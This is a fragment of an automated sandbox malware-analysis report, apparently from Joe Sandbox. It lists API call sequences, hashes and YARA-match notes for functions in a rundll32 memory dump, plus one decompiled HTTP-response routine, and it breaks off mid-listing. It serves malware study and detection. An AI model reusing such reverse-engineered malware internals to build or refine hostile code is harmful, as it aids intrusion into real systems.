                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 05B81B1B
                          • GetWindowThreadProcessId.USER32(?,?), ref: 05B81B60
                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 05B81B88
                          • _strupr.NTDLL ref: 05B81BB3
                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 05B81BC0
                          • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 05B81BDA
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ProcessThread$Window$CloseCurrentHandleOpen_struprlstrlen
                          • String ID:
                          • API String ID: 3831658075-0
                          • Opcode ID: b8963f835d0dd353084da36ba7eb4d501b7a0c8750bb76f0c4b5ddaa1587d5d1
                          • Instruction ID: 60893b47fff01d075c5b779944a1912230e814dc1d703b2d7cf9d9894b6f8a6f
                          • Opcode Fuzzy Hash: b8963f835d0dd353084da36ba7eb4d501b7a0c8750bb76f0c4b5ddaa1587d5d1
                          • Instruction Fuzzy Hash: C8412A71901219FBDF21AFA8CC4ABFEBBB9FB48701F145496F602A2150DB74A641CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B7508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B7509E
                            • Part of subcall function 05B7508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750B7
                            • Part of subcall function 05B7508C: GetCurrentThreadId.KERNEL32 ref: 05B750C4
                            • Part of subcall function 05B7508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750D0
                            • Part of subcall function 05B7508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750DE
                            • Part of subcall function 05B7508C: lstrcpy.KERNEL32(00000000), ref: 05B75100
                          • StrChrA.SHLWAPI(?,0000002C,00003219), ref: 05B74943
                          • StrTrimA.SHLWAPI(?,?), ref: 05B74961
                          • StrTrimA.SHLWAPI(?,?,?,?,00000001), ref: 05B749CA
                          • HeapFree.KERNEL32(00000000,00000000,?,?,00000001), ref: 05B749EB
                          • DeleteFileA.KERNEL32(?,00003219), ref: 05B74A0D
                          • HeapFree.KERNEL32(00000000,?), ref: 05B74A1C
                          • HeapFree.KERNEL32(00000000,?,00003219), ref: 05B74A34
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileFreeHeapTemp$PathTimeTrim$CurrentDeleteNameSystemThreadlstrcpy
                          • String ID:
                          • API String ID: 1078934163-0
                          • Opcode ID: 5aeec2b047c5529dfd693aa1915da86b2d38ad1a75dc13cf8f2e5e4be2ada520
                          • Instruction ID: 8246018bf8178a301bc51db3b99bda553f054d49d4037d6f63e42f98d571fa98
                          • Opcode Fuzzy Hash: 5aeec2b047c5529dfd693aa1915da86b2d38ad1a75dc13cf8f2e5e4be2ada520
                          • Instruction Fuzzy Hash: 6931BD32214209AFDB10EB94DC05F7ABBE9FB45705F040055FA44EB180EB74F90ACBA6
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RtlAllocateHeap.NTDLL(00000000,05B68478,00000000), ref: 05B6E02B
                          • RtlAllocateHeap.NTDLL(00000000,00000024), ref: 05B6E040
                          • memset.NTDLL ref: 05B6E04D
                          • HeapFree.KERNEL32(00000000,00000000,?,05B68477,?,?,00000000,?,00000000,05B79CD0,?,00000000), ref: 05B6E06A
                          • memcpy.NTDLL(?,?,05B68477,?,05B68477,?,?,00000000,?,00000000,05B79CD0,?,00000000), ref: 05B6E08B
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Allocate$Freememcpymemset
                          • String ID: chun
                          • API String ID: 2362494589-3058818181
                          • Opcode ID: 4f04c16fda546f2b5ef300a1b30e397b1f0ebdf2498ac634a65cf984a2552f0e
                          • Instruction ID: a13dca3526f90917a285ffd5e295b731a558b7deb468d92ea91ca2b0aa94848e
                          • Opcode Fuzzy Hash: 4f04c16fda546f2b5ef300a1b30e397b1f0ebdf2498ac634a65cf984a2552f0e
                          • Instruction Fuzzy Hash: EF317A75200606AFDB309F69C845A67BBEEFF44310F01846AF95ACB260DB38F905DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E01004A85(void* __ecx, void* __esi) {
                          				long _v8;
                          				long _v12;
                          				long _v16;
                          				long _v20;
                          				long _t34;
                          				long _t39;
                          				long _t42;
                          				long _t56;
                          				void* _t58;
                          				void* _t59;
                          				void* _t61;
                          
                          				_t61 = __esi;
                          				_t59 = __ecx;
                          				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                          				do {
                          					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                          					_v20 = _t34;
                          					if(_t34 != 0) {
                          						L3:
                          						_v8 = 4;
                          						_v16 = 0;
                          						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
                          							_t39 = GetLastError();
                          							_v12 = _t39;
                          							if(_v20 == 0 || _t39 != 0x2ef3) {
                          								L15:
                          								return _v12;
                          							} else {
                          								goto L11;
                          							}
                          						}
                          						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
                          							goto L11;
                          						} else {
                          							_v16 = 0;
                          							_v8 = 0;
                          							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
                          							_t58 = E01006D63(_v8 + 1);
                          							if(_t58 == 0) {
                          								_v12 = 8;
                          							} else {
                          								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
                          									E01006C2C(_t58);
                          									_v12 = GetLastError();
                          								} else {
                          									 *((char*)(_t58 + _v8)) = 0;
                          									 *(_t61 + 0xc) = _t58;
                          								}
                          							}
                          							goto L15;
                          						}
                          					}
                          					SetEvent( *(_t61 + 0x1c));
                          					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                          					_v12 = _t56;
                          					if(_t56 != 0) {
                          						goto L15;
                          					}
                          					goto L3;
                          					L11:
                          					_t42 = E01006E40( *(_t61 + 0x1c), _t59, 0xea60);
                          					_v12 = _t42;
                          				} while (_t42 == 0);
                          				goto L15;
                          			}

                          APIs
                          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,76CC81D0,00000000,00000000), ref: 01004A9C
                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,0100593D,00000000,?), ref: 01004AAC
                          • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 01004ADE
                          • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 01004B03
                          • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 01004B23
                          • GetLastError.KERNEL32 ref: 01004B35
                            • Part of subcall function 01006E40: WaitForMultipleObjects.KERNEL32(00000002,01007BB5,00000000,01007BB5,?,?,?,01007BB5,0000EA60), ref: 01006E5B
                            • Part of subcall function 01006C2C: RtlFreeHeap.NTDLL(00000000,00000000,01005E1D,00000000,?,?,00000000), ref: 01006C38
                          • GetLastError.KERNEL32(00000000), ref: 01004B6A
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                          • String ID:
                          • API String ID: 3369646462-0
                          • Opcode ID: 7a6ddf49cb1fd080a9ac3402dd74560130970382caf0534ce7f349ee09974573
                          • Instruction ID: e18ff72aca2a2534653c76138ecb7dedd0c9c045660f0156cec4653ca29da689
                          • Opcode Fuzzy Hash: 7a6ddf49cb1fd080a9ac3402dd74560130970382caf0534ce7f349ee09974573
                          • Instruction Fuzzy Hash: DE3134B5D00709EFEB22DFE5C884A9EBBF8EB48304F1049A9E782D2181D7759A44DF54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B7508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B7509E
                            • Part of subcall function 05B7508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750B7
                            • Part of subcall function 05B7508C: GetCurrentThreadId.KERNEL32 ref: 05B750C4
                            • Part of subcall function 05B7508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750D0
                            • Part of subcall function 05B7508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750DE
                            • Part of subcall function 05B7508C: lstrcpy.KERNEL32(00000000), ref: 05B75100
                          • lstrlen.KERNEL32(00000000,00000000,00000F00,00000000), ref: 05B68ED3
                            • Part of subcall function 05B6A5E7: lstrlen.KERNEL32(00000000,76CDF730,-00000001,00000000,?,?,?,05B68EF7,?,00000000,000000FF), ref: 05B6A5F8
                            • Part of subcall function 05B6A5E7: lstrlen.KERNEL32(?,?,?,?,05B68EF7,?,00000000,000000FF), ref: 05B6A5FF
                            • Part of subcall function 05B6A5E7: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 05B6A611
                            • Part of subcall function 05B6A5E7: _snprintf.NTDLL ref: 05B6A637
                            • Part of subcall function 05B6A5E7: _snprintf.NTDLL ref: 05B6A66B
                            • Part of subcall function 05B6A5E7: HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,00000000,000000FF), ref: 05B6A688
                          • StrTrimA.SHLWAPI(00000000, s:,?,?,?,?,00000000,?,00000000,000000FF), ref: 05B68F6D
                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,000000FF), ref: 05B68F8A
                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,000000FF), ref: 05B68F92
                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,000000FF), ref: 05B68FA1
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$FileFreeTemplstrlen$PathTime_snprintf$AllocateCurrentDeleteNameSystemThreadTrimlstrcpy
                          • String ID: s:
                          • API String ID: 2960378068-2363032815
                          • Opcode ID: f00e1558cb90a4e0a6af6445dba6ed513dccb215e6db655a20f523a48c968a0b
                          • Instruction ID: 54f66ce4354208499cb16eac99f9b46bf26138f24bc54e1a8a88f0b9bcdf6999
                          • Opcode Fuzzy Hash: f00e1558cb90a4e0a6af6445dba6ed513dccb215e6db655a20f523a48c968a0b
                          • Instruction Fuzzy Hash: 5D311E72A10205BFDB20AAE9CC85FEEBFFDEB08211F040595B615E7141EA74B544CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 05B613F6
                          • lstrcmpiW.KERNEL32(00000000,?), ref: 05B6142E
                          • lstrcmpiW.KERNEL32(?,?), ref: 05B61443
                          • lstrlenW.KERNEL32(?), ref: 05B6144A
                          • CloseHandle.KERNEL32(?), ref: 05B61472
                          • DeleteFileW.KERNEL32(?,?,?,?,?,?), ref: 05B6149E
                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 05B614BC
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalSectionlstrcmpi$CloseDeleteEnterFileHandleLeavelstrlen
                          • String ID:
                          • API String ID: 1496873005-0
                          • Opcode ID: 5f5991e0bdc012b05fb936a03d694a14bcc76d62abe335794a455f4ef87b8129
                          • Instruction ID: 8ef63961494c229b54336c61b2e3cde70afe8a89cc6edf25d9d7ec2421fa2b6e
                          • Opcode Fuzzy Hash: 5f5991e0bdc012b05fb936a03d694a14bcc76d62abe335794a455f4ef87b8129
                          • Instruction Fuzzy Hash: AA215AB1610205BFDB20AFBADC89E7A7BBEFF04600B1450A5B502A3140EB38F905CF60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • lstrlen.KERNEL32(05B6F67C,00000000,05B8A420,05B8A440,?,?,05B6F67C,05B7E453,05B8A420), ref: 05B6F802
                          • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 05B6F818
                          • lstrlen.KERNEL32(05B7E453,?,?,05B6F67C,05B7E453,05B8A420), ref: 05B6F820
                          • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 05B6F82C
                          • lstrcpy.KERNEL32(05B8A420,05B6F67C), ref: 05B6F842
                          • HeapFree.KERNEL32(00000000,00000000,?,?,05B6F67C,05B7E453,05B8A420), ref: 05B6F896
                          • HeapFree.KERNEL32(00000000,05B8A420,?,?,05B6F67C,05B7E453,05B8A420), ref: 05B6F8A5
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateFreelstrlen$lstrcpy
                          • String ID:
                          • API String ID: 1531811622-0
                          • Opcode ID: dc36cb8cb268e30e7c1915035ab6633fff17a805ecaf13d084cf3ef6adb3729c
                          • Instruction ID: 9b9cfbec2047c0d57a215e915086af7bed63c1535ba717da1f3919db0730f2a9
                          • Opcode Fuzzy Hash: dc36cb8cb268e30e7c1915035ab6633fff17a805ecaf13d084cf3ef6adb3729c
                          • Instruction Fuzzy Hash: 0121CF31104244BEEB224F28AC45B7A7FAAEB4A250F1440A9F85997255CA35B846E7A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • lstrlenW.KERNEL32(00000000,00000000,?,?,00000000,?,05B70E77,00000000), ref: 05B813DA
                            • Part of subcall function 05B73193: lstrcpy.KERNEL32(-000000FC,00000000), ref: 05B731CD
                            • Part of subcall function 05B73193: CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,05B813E7,?,?,00000000,?,05B70E77,00000000), ref: 05B731DF
                            • Part of subcall function 05B73193: GetTickCount.KERNEL32 ref: 05B731EA
                            • Part of subcall function 05B73193: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,05B813E7,?,?,00000000,?,05B70E77,00000000), ref: 05B731F6
                            • Part of subcall function 05B73193: lstrcpy.KERNEL32(00000000), ref: 05B73210
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • lstrcpy.KERNEL32(00000000), ref: 05B81415
                          • wsprintfA.USER32 ref: 05B81428
                          • GetTickCount.KERNEL32 ref: 05B8143D
                          • wsprintfA.USER32 ref: 05B81452
                            • Part of subcall function 05B7E803: RtlFreeHeap.NTDLL(00000000,?,05B73953,?,?,05B7BF5B,00000000,00000000,05B610B0,00000000,05B89F2C,00000008,00000003), ref: 05B7E80F
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$CountHeapTickwsprintf$AllocateCreateDirectoryFileFreeNameTemplstrlen
                          • String ID: "%S"
                          • API String ID: 1152860224-1359967185
                          • Opcode ID: 597f3430dfe3b960909d3d262382c17bebb9f239c2f3cb1585de7072addc6a42
                          • Instruction ID: 88630eb31e41159a7275add79bce165df8ba7b07b81877bdf007ae6f0dba19c6
                          • Opcode Fuzzy Hash: 597f3430dfe3b960909d3d262382c17bebb9f239c2f3cb1585de7072addc6a42
                          • Instruction Fuzzy Hash: EA119A726052197FC710BBA89C4DE7F7B9CEF85650B195895F90997201EA38F801CBB1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B7508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B7509E
                            • Part of subcall function 05B7508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750B7
                            • Part of subcall function 05B7508C: GetCurrentThreadId.KERNEL32 ref: 05B750C4
                            • Part of subcall function 05B7508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750D0
                            • Part of subcall function 05B7508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750DE
                            • Part of subcall function 05B7508C: lstrcpy.KERNEL32(00000000), ref: 05B75100
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00001ED2,?,00000000,?,?,05B6314A,00000000), ref: 05B697BD
                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,00001ED2,?,00000000,?,?,05B6314A,00000000,00000000,00000004,?,00000000,?), ref: 05B69830
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileTemp$PathTime$CreateCurrentFreeHeapNameSystemThreadlstrcpy
                          • String ID:
                          • API String ID: 2078930461-0
                          • Opcode ID: a1cc79e3adf2fe02ed2a9d37db20f905181f3fd28428d6f7ea6125245b677fb3
                          • Instruction ID: 4663d44cada05bf35c9aa73f1d209c78ac5513babfab62bf0f8eefd1f1a5cd68
                          • Opcode Fuzzy Hash: a1cc79e3adf2fe02ed2a9d37db20f905181f3fd28428d6f7ea6125245b677fb3
                          • Instruction Fuzzy Hash: 1111BC31241318BBD7312A61EC8EF7F3F9EEB457A1F100122FA15A61D0DA76B858D6E1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B7358E: lstrlen.KERNEL32(00000000,00000000,76CC81D0,773BEEF0,?,?,?,05B7EA2E,?,76C85520,773BEEF0,?,00000000,05B6E842,00000000,05FBC310), ref: 05B735F5
                            • Part of subcall function 05B7358E: sprintf.NTDLL ref: 05B73616
                          • lstrlen.KERNEL32(00000000,76CC81D0,?,76C85520,773BEEF0,?,00000000,05B6E842,00000000,05FBC310), ref: 05B7EA40
                          • lstrlen.KERNEL32(?,?,00000000,05B6E842,00000000,05FBC310), ref: 05B7EA48
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • strcpy.NTDLL ref: 05B7EA5F
                          • lstrcat.KERNEL32(00000000,?), ref: 05B7EA6A
                            • Part of subcall function 05B7C32E: lstrlen.KERNEL32(?,?,?,00000000,?,05B7EA79,00000000,?,?,00000000,05B6E842,00000000,05FBC310), ref: 05B7C33F
                            • Part of subcall function 05B7E803: RtlFreeHeap.NTDLL(00000000,?,05B73953,?,?,05B7BF5B,00000000,00000000,05B610B0,00000000,05B89F2C,00000008,00000003), ref: 05B7E80F
                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,00000000,05B6E842,00000000,05FBC310), ref: 05B7EA87
                            • Part of subcall function 05B6930C: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,05B7EA93,00000000,?,00000000,05B6E842,00000000,05FBC310), ref: 05B69316
                            • Part of subcall function 05B6930C: _snprintf.NTDLL ref: 05B69374
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                          • String ID: =
                          • API String ID: 2864389247-1428090586
                          • Opcode ID: 8ce360d1cdd72104d74c751d1e9385174256515dbcd7d5e3e1075eaf43213e8e
                          • Instruction ID: 73029ae0f5cac03e0d6afb054c5e8e16469e81b49e94420abf57e7fae963a28c
                          • Opcode Fuzzy Hash: 8ce360d1cdd72104d74c751d1e9385174256515dbcd7d5e3e1075eaf43213e8e
                          • Instruction Fuzzy Hash: 65118273A056297B8B22BBB89C8CC7E3BADAE8555031500D5F915AB240DE78FD0297E0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SwitchToThread.KERNEL32(?,?,05B7E846), ref: 05B69EAD
                          • CloseHandle.KERNEL32(?,?,05B7E846), ref: 05B69EB9
                          • CloseHandle.KERNEL32(00000000,76CDF720,?,05B63576,00000000,?,?,?,05B7E846), ref: 05B69ECB
                          • memset.NTDLL ref: 05B69EE2
                          • memset.NTDLL ref: 05B69EF9
                          • memset.NTDLL ref: 05B69F10
                          • memset.NTDLL ref: 05B69F27
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: memset$CloseHandle$SwitchThread
                          • String ID:
                          • API String ID: 3699883640-0
                          • Opcode ID: 8d562a20152cf9ef13005646155b71628675387b14ba0268af9ad1b99d797ea9
                          • Instruction ID: b02962edc011968045888a9456070833eba7a93ee2ad6988ce201e397e4a090f
                          • Opcode Fuzzy Hash: 8d562a20152cf9ef13005646155b71628675387b14ba0268af9ad1b99d797ea9
                          • Instruction Fuzzy Hash: 69119131A555286BC7323F25AC0ED6B7EAFBFD5B21B4810D7F005A3140CF6AB980C6A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B6CAAB
                          • wcstombs.NTDLL ref: 05B6CABC
                            • Part of subcall function 05B64963: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,05B670EB,00000000,?,00000000,?,?,?,?,?,?), ref: 05B64975
                            • Part of subcall function 05B64963: StrChrA.SHLWAPI(?,00000020,?,00000000,05B670EB,00000000,?,00000000,?,?,?,?,?,?), ref: 05B64984
                          • OpenProcess.KERNEL32(00000001,00000000,?,00000000), ref: 05B6CADD
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 05B6CAEC
                          • CloseHandle.KERNEL32(00000000), ref: 05B6CAF3
                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 05B6CB02
                          • WaitForSingleObject.KERNEL32(00000000), ref: 05B6CB12
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: HeapProcess$AllocateCloseFreeHandleObjectOpenSingleTerminateWaitwcstombs
                          • String ID:
                          • API String ID: 417118235-0
                          • Opcode ID: 0b509343b7f93df18f235337ca802301960b87b2769eca6af2fcb0f66fc8d684
                          • Instruction ID: 4bd024e2ab80b655d4b072a50532fd5e0fb68e92f4aa19d64cdaf09c0d0a683c
                          • Opcode Fuzzy Hash: 0b509343b7f93df18f235337ca802301960b87b2769eca6af2fcb0f66fc8d684
                          • Instruction Fuzzy Hash: BF118B31210215BFE7219F54DC8ABAA7FAAFF04315F141060F946A6180CBB9BD54DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B7508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B7509E
                            • Part of subcall function 05B7508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750B7
                            • Part of subcall function 05B7508C: GetCurrentThreadId.KERNEL32 ref: 05B750C4
                            • Part of subcall function 05B7508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750D0
                            • Part of subcall function 05B7508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750DE
                            • Part of subcall function 05B7508C: lstrcpy.KERNEL32(00000000), ref: 05B75100
                          • lstrcpy.KERNEL32(-000000FC,00000000), ref: 05B731CD
                          • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,05B813E7,?,?,00000000,?,05B70E77,00000000), ref: 05B731DF
                          • GetTickCount.KERNEL32 ref: 05B731EA
                          • GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,05B813E7,?,?,00000000,?,05B70E77,00000000), ref: 05B731F6
                          • lstrcpy.KERNEL32(00000000), ref: 05B73210
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Temp$Filelstrcpy$NamePathTime$CountCreateCurrentDirectorySystemThreadTick
                          • String ID: \Low
                          • API String ID: 1629304206-4112222293
                          • Opcode ID: 5af63f9bae95f05bb5b16938654436ab8a90d5f1fc43d9a49ed3bb72a51c3d33
                          • Instruction ID: a740552f70f0e790a38a147d4c2ac4c915397477bed24f6b0883386a268c2bee
                          • Opcode Fuzzy Hash: 5af63f9bae95f05bb5b16938654436ab8a90d5f1fc43d9a49ed3bb72a51c3d33
                          • Instruction Fuzzy Hash: 1E01A931201628ABD7206AB69C49FBB7BDDEF02651F1908A0F521D3180DF28F900DAB4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • wsprintfA.USER32 ref: 05B66F64
                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 05B66F76
                          • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 05B66FA0
                          • WaitForMultipleObjects.KERNEL32(00000002,05B72EB3,00000000,000000FF), ref: 05B66FB3
                          • CloseHandle.KERNEL32(05B72EB3), ref: 05B66FBC
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: TimerWaitable$CloseCreateHandleMultipleObjectsWaitwsprintf
                          • String ID: 0x%08X
                          • API String ID: 603522830-3182613153
                          • Opcode ID: c443a9d4ae5a284ec66085cbfb53bc795a3d9525d1612579fb832c742814e866
                          • Instruction ID: 33ada9254e60ffa9e0ca555d65730a3c327c3f8f0acd0c70eb31fa13af3f818b
                          • Opcode Fuzzy Hash: c443a9d4ae5a284ec66085cbfb53bc795a3d9525d1612579fb832c742814e866
                          • Instruction Fuzzy Hash: 9F014871905229BBCB10AB94DC4ADEFBF7DEF05360F104158B916A21C5EB74A601CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • GetLastError.KERNEL32(?,?,?,00001000,?,05B8A2F4,76CDF750), ref: 05B7D38B
                          • WaitForSingleObject.KERNEL32(00000000,00000000,?,05B8A2F4,76CDF750), ref: 05B7D410
                          • CloseHandle.KERNEL32(00000000,?,05B8A2F4,76CDF750), ref: 05B7D42A
                          • OpenProcess.KERNEL32(00100000,00000000,00000000,?,05B8A2F4,76CDF750), ref: 05B7D45F
